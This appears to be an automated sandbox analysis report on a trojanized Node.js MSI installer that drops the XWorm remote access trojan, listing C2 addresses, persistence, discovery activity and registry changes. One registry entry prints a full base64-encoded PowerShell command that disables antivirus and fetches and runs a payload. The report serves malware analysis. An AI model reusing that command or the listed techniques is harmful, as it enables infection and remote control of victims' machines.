xworm | 9eea480bd30c98ae11a97cb89a9278235cbbbd03c171ee5e5198bd86b7965b4b

Resubmissions

07/12/2024, 23:55

241207-3yffes1ldv 10

07/12/2024, 23:44

241207-3raxcswkcj 10

Analysis

max time kernel
500s
max time network
511s
platform
windows11-21h2_x64
resource
win11-20241007-en
resource tags

arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
submitted
07/12/2024, 23:44

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

node-v22.11.0-x64.msi
Size

28.9MB
MD5

fa9e1f3064a66913362e9bff7097cef5
SHA1

b34f1f9a9f6242c54486a4bc453a9336840b4425
SHA256

9eea480bd30c98ae11a97cb89a9278235cbbbd03c171ee5e5198bd86b7965b4b
SHA512

ad3e9469326dccac6b49185b5b2814ba700b5d83b4b3ce17f85a9adc5f90bdebf54d79800b253ed5c371ab82d27304841f86ab1a8a3c7ffade8a2d78e55dc99f
SSDEEP

786432:EtShU+9S49htlhk3tKuiU9IsO9IP1/lBMS8k4:EAUK/U9IN961/l

Score

10^/10

xworm discovery execution persistence privilege_escalation ransomware rat trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://github.com/michealjames96/robIox-cdn/raw/refs/heads/main/Onedrive.exe

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://github.com/michealjames96/robIox-cdn/raw/refs/heads/main/Onedrive.exe

Extracted

Family

xworm

127.0.0.1:10025

147.185.221.24:10025

Attributes

Install_directory
%AppData%
install_file
XClient.exe

Signatures

Detect Xworm Payload 2 IoCs

resource	yara_rule
behavioral1/files/0x000a00000002c124-3197.dat	family_xworm
behavioral1/memory/1912-3203-0x0000000000200000-0x000000000022E000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm
Renames multiple (164) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
ransomware

Blocklisted process makes network request 8 IoCs

flow	pid	Process
2	3936	msiexec.exe
5	3936	msiexec.exe
55	5984	powershell.exe
56	5984	powershell.exe
99	5876	powershell.exe
100	5876	powershell.exe
127	5260	powershell.exe
128	5260	powershell.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk	Onedrive.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk	Onedrive.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000\Software\Microsoft\Windows\CurrentVersion\Run\Onedrive = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Onedrive.exe"	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
5984	powershell.exe
2404	powershell.exe
5876	powershell.exe
2064	powershell.exe
5260	powershell.exe
5964	powershell.exe

Enumerates connected drives 3 TTPs 46 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 12 IoCs

Web Service

T1102

flow	ioc
51	raw.githubusercontent.com
98	raw.githubusercontent.com
126	discord.com
125	raw.githubusercontent.com
31	discord.com
31	raw.githubusercontent.com
48	discord.com
49	discord.com
56	raw.githubusercontent.com
96	discord.com
100	raw.githubusercontent.com
128	raw.githubusercontent.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
31	ip-api.com

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\agent-base\LICENSE	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\cacache\node_modules\yallist\dist\esm\index.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\@sigstore\sign\dist\external\fulcio.js	msiexec.exe
File created	C:\Program Files\nodejs\corepack.cmd	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\lib\commands\ci.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\lib\commands\hook.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\normalize-package-data\LICENSE	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\corepack\dist\lib\corepack.cjs	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\ci-info\LICENSE	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\node-gyp\gyp\pylib\gyp\mac_tool.py	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\tar\lib\strip-trailing-slashes.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\treeverse\lib\index.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\tuf-js\node_modules\cacache\lib\get.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\cacache\node_modules\tar\dist\esm\header.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\glob\dist\commonjs\processor.js.map	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\man\man1\npm-unstar.1	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\cacache\node_modules\mkdirp\dist\mjs\index.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\node-gyp\node_modules\make-fetch-happen\LICENSE	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\tuf-js\node_modules\make-fetch-happen\lib\cache\key.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\docs\content\commands\npm-login.md	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\isexe\package.json	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\make-fetch-happen\lib\cache\key.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\qrcode-terminal\LICENSE	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\@sigstore\verify\dist\tlog\intoto.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\cacache\node_modules\mkdirp\dist\cjs\src\index.js.map	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\https-proxy-agent\dist\index.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\rimraf\dist\esm\rimraf-windows.d.ts.map	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\man\man1\npm-prefix.1	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\cacache\node_modules\mkdirp\dist\mjs\mkdirp-manual.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\rimraf\dist\commonjs\default-tmp.d.ts.map	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\rimraf\dist\esm\path-arg.d.ts.map	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\docs\content\using-npm\scope.md	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\lib\commands\doctor.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\fastest-levenshtein\bench.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\foreground-child\dist\esm\index.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\spdx-correct\node_modules\spdx-expression-parse\AUTHORS	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\tar\lib\create.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\docs\content\commands\npm-hook.md	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\minimatch\dist\esm\ast.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\minimatch\dist\esm\brace-expressions.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\mute-stream\package.json	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\man\man1\npm-explore.1	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\@npmcli\config\lib\definitions\index.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\aproba\LICENSE	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\glob\dist\commonjs\index.d.ts	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\qrcode-terminal\example\callback.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\smart-buffer\build\utils.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\tiny-relative-date\lib\index.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\@sigstore\sign\node_modules\make-fetch-happen\lib\remote.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\libnpmorg\README.md	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\minizlib\package.json	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\mkdirp\lib\opts-arg.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\node-gyp\gyp\pylib\gyp\generator\ninja_test.py	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\postcss-selector-parser\dist\selectors\tag.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\cacache\lib\rm.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\glob\dist\esm\package.json	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\glob\dist\esm\processor.js.map	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\pacote\LICENSE	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\docs\content\commands\npm-update.md	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\docs\output\commands\npm-rebuild.html	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\@npmcli\git\lib\make-error.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\fastest-levenshtein\test.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\glob\dist\esm\has-magic.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\ip-regex\license	msiexec.exe

Drops file in Windows directory 19 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Installer\MSIF90A.tmp	msiexec.exe
File created	C:\Windows\Installer\e57d35f.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIFB1E.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\	msiexec.exe
File created	C:\Windows\SystemTemp\~DFAEE95617857DDC3C.TMP	msiexec.exe
File created	C:\Windows\Installer\{A6C2B110-5934-4A7F-B8C1-51E7CD51FF82}\NodeIcon	msiexec.exe
File created	C:\Windows\SystemTemp\~DFC0CFE8FE4C1DF242.TMP	msiexec.exe
File opened for modification	C:\Windows\Installer\{A6C2B110-5934-4A7F-B8C1-51E7CD51FF82}\NodeIcon	msiexec.exe
File created	C:\Windows\Installer\e57d35d.msi	msiexec.exe
File created	C:\Windows\Installer\inprogressinstallinfo.ipi	msiexec.exe
File created	C:\Windows\Installer\SourceHash{A6C2B110-5934-4A7F-B8C1-51E7CD51FF82}	msiexec.exe
File created	C:\Windows\SystemTemp\~DFCC87FDEAEF4076A9.TMP	msiexec.exe
File opened for modification	C:\Windows\Installer\e57d35d.msi	msiexec.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log	msiexec.exe
File opened for modification	C:\Windows\Installer\MSID92C.tmp	msiexec.exe
File created	C:\Windows\SystemTemp\~DF8ABBC733AC4CE566.TMP	msiexec.exe
File opened for modification	C:\Windows\Installer\MSID457.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSID487.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIDA46.tmp	msiexec.exe

Executes dropped EXE 20 IoCs

pid	Process
2280	node.exe
5052	node.exe
3400	node.exe
5620	b74668fc0382f3c656ffb31c8c9a38b5bbd77a06.exe
1912	Onedrive.exe
5316	node.exe
2672	node.exe
4176	node.exe
5576	node.exe
3204	node.exe
6128	f66155b791a72518a5d05e25caf6eb0696d2374a.exe
5584	Onedrive.exe
2744	node.exe
4200	node.exe
1092	node.exe
5720	node.exe
2856	node.exe
5000	screenCapture_1.3.2.exe
1440	6742f35676188b60edccbaefb71aab415ab42054.exe
2504	Onedrive.exe

Loads dropped DLL 10 IoCs

pid	Process
2980	MsiExec.exe
2980	MsiExec.exe
3976	MsiExec.exe
3976	MsiExec.exe
3976	MsiExec.exe
3852	MsiExec.exe
3100	MsiExec.exe
3400	node.exe
3204	node.exe
2856	node.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Installer Packages 2 TTPs 1 IoCs

persistence privilege_escalation

Installer Packages

T1546.016

Msiexec

T1218.007

pid	Process
3936	msiexec.exe

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MsiExec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe

Checks SCSI registry key(s) 3 TTPs 8 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000	Taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	Taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	Taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters	vssvc.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr	vssvc.exe
Set value (data)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 000000000400000097e32746e391c5270000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000c01200000000ffffffff00000000270101000008000097e327460000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d01200000000000020ed3a000000ffffffff00000000070001000068090097e32746000000000000d012000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f0ff3a0000000000000005000000ffffffff000000000700010000f87f1d97e32746000000000000f0ff3a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff00000000000000000000000097e3274600000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	vssvc.exe
Set value (data)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	vssvc.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Taskmgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	Taskmgr.exe

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Modifies data under HKEY_USERS 3 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\27	msiexec.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E	msiexec.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26	msiexec.exe

Modifies registry class 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\ms-settings\Shell\Open	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\011B2C6A4395F7A48B1C157EDC15FF28\Version = "369819648"	msiexec.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\ca75muodqnve38eo8skc\Shell\open\command\	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\sn38h4mo3yegjar53e7s\Shell\open\command\	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\ms-settings\Shell\Open\command\ = "C:\\WindowsApi\\f66155b791a72518a5d05e25caf6eb0696d2374a.exe /c powershell -Command \"$b64 = 'JHBzV2luZG93ID0gKEdldC1Qcm9jZXNzIC1JZCAkUElEKS5NYWluV2luZG93SGFuZGxlOyBBZGQtVHlwZSAtVHlwZURlZmluaXRpb24gJ3VzaW5nIFN5c3RlbTsgdXNpbmcgU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzOyBwdWJsaWMgY2xhc3MgV2luQVBJIHsgW0RsbEltcG9ydCgidXNlcjMyLmRsbCIpXSBwdWJsaWMgc3RhdGljIGV4dGVybiBib29sIFNob3dXaW5kb3coSW50UHRyIGhXbmQsIGludCBuQ21kU2hvdyk7IH0nOyBbV2luQVBJXTo6U2hvd1dpbmRvdygkcHNXaW5kb3csIDYpOyBpZiAoR2V0LVNlcnZpY2UgTUJBTVNlcnZpY2UgLUVycm9yQWN0aW9uIFNpbGVudGx5Q29udGludWUgfCBXaGVyZS1PYmplY3QgeyAkXy5TdGF0dXMgLWVxICdSdW5uaW5nJyB9KSB7IFN0YXJ0LVByb2Nlc3MgLUZpbGVQYXRoICJDOlxQcm9ncmFtIEZpbGVzXE1hbHdhcmVieXRlc1xBbnRpLU1hbHdhcmVcbWFsd2FyZWJ5dGVzX2Fzc2lzdGFudC5leGUiIC1Bcmd1bWVudExpc3QgIi0tc3RvcHNlcnZpY2UiIH07IEdldC1XbWlPYmplY3QgV2luMzJfTG9naWNhbERpc2sgfCBXaGVyZS1PYmplY3QgeyAkXy5Ecml2ZVR5cGUgLWVxIDMgfSB8IEZvckVhY2gtT2JqZWN0IHsgQWRkLU1wUHJlZmVyZW5jZSAtRXhjbHVzaW9uUGF0aCAoJF8uRGV2aWNlSUQuVHJpbSgpICsgIlwiKSB9OyAkdT0iaHR0cHM6Ly9naXRodWIuY29tL21pY2hlYWxqYW1lczk2L3JvYklveC1jZG4vcmF3L3JlZnMvaGVhZHMvbWFpbi9PbmVkcml2ZS5leGUiOyAkcD0iJGVudjpURU1QXE9uZWRyaXZlLmV4ZSI7IEludm9rZS1XZWJSZXF1ZXN0IC1VcmkgJHUgLU91dEZpbGUgJHAgLVVzZUJhc2ljUGFyc2luZzsgU3RhcnQtUHJvY2VzcyAtRmlsZVBhdGggJHAgLVZlcmIgUnVuQXMK'; $decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($b64)); Invoke-Expression $decoded\""	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\ms-settings	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\g9eriio86qu4avews7s5\Shell\open\command	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\ms-settings\Shell\Open\command	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\ca75muodqnve38eo8skc\Shell\open\command\ = "C:\\WindowsApi\\f66155b791a72518a5d05e25caf6eb0696d2374a.exe"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\sn38h4mo3yegjar53e7s	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\ms-settings	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\ms-settings\Shell\Open\command	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\A3A70C74FE2431248AD5F8A59570C782\011B2C6A4395F7A48B1C157EDC15FF28	msiexec.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\011B2C6A4395F7A48B1C157EDC15FF28\Clients = 3a0000000000	msiexec.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\ms-settings\Shell\Open\command\DelegateExecute	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\011B2C6A4395F7A48B1C157EDC15FF28\ProductIcon = "C:\\Windows\\Installer\\{A6C2B110-5934-4A7F-B8C1-51E7CD51FF82}\\NodeIcon"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\011B2C6A4395F7A48B1C157EDC15FF28\SourceList	msiexec.exe
Key created	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Local Settings\MuiCache	BackgroundTransferHost.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\011B2C6A4395F7A48B1C157EDC15FF28\EnvironmentPathNode = "EnvironmentPath"	msiexec.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\g9eriio86qu4avews7s5\Shell\open\command\	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\ms-settings\Shell\Open	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\ms-settings	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\sn38h4mo3yegjar53e7s\Shell\open	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\011B2C6A4395F7A48B1C157EDC15FF28\DocumentationShortcuts	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\011B2C6A4395F7A48B1C157EDC15FF28\Assignment = "1"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\A3A70C74FE2431248AD5F8A59570C782	msiexec.exe
Key created	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\g9eriio86qu4avews7s5	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\ms-settings\Shell\Open\command	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\ca75muodqnve38eo8skc\Shell	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\ms-settings\Shell\Open\command	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\ms-settings\Shell\Open\command\	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\sn38h4mo3yegjar53e7s	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:"	BackgroundTransferHost.exe
Key created	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\ms-settings\Shell\Open\command	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\011B2C6A4395F7A48B1C157EDC15FF28\corepack	msiexec.exe
Key created	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\g9eriio86qu4avews7s5\Shell	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\ms-settings\Shell\Open\command\DelegateExecute	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\011B2C6A4395F7A48B1C157EDC15FF28\PackageCode = "7ADA4E96FE88DF64FB4F54512750A882"	msiexec.exe
Key created	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\ms-settings\Shell	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\sn38h4mo3yegjar53e7s\Shell\open\command\ = "C:\\WindowsApi\\6742f35676188b60edccbaefb71aab415ab42054.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\g9eriio86qu4avews7s5\Shell\open\command\ = "C:\\WindowsApi\\b74668fc0382f3c656ffb31c8c9a38b5bbd77a06.exe"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\ca75muodqnve38eo8skc\Shell\open\command	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\ms-settings\Shell	reg.exe
